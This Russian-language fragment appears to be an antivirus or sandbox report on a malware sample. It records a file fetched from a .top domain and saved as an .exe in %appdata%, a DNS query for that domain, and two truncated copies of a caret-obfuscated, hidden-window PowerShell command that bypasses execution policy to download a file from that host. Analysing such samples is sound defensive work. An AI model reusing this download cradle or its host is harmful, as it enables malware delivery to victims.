Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^Ers^HEll^.EXe -^eX^e^c^UtI^Onp^oliCy ^bYpa^SS -no^P^RofILE^ -^wINDOWS^ty^lE^ ^Hid^DEn ^(N^EW-obJ^e^c^T ^SY^St^e^m^.^neT^.wEbClIE^NT).do^WnL^o^AD^fI^Le^(^'http://www.zonedope...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^Ers^HEll^.EXe -^eX^e^c^UtI^Onp^oliCy ^bYpa^SS -no^P^RofILE^ -^wINDOWS^ty^lE^ ^Hid^DEn ^(N^EW-obJ^e^c^T ^SY^St^e^m^.^neT^.wEbClIE^NT).do^WnL^o^AD^fI^Le^(^'http://www.zonedope...' (со скрытым окном)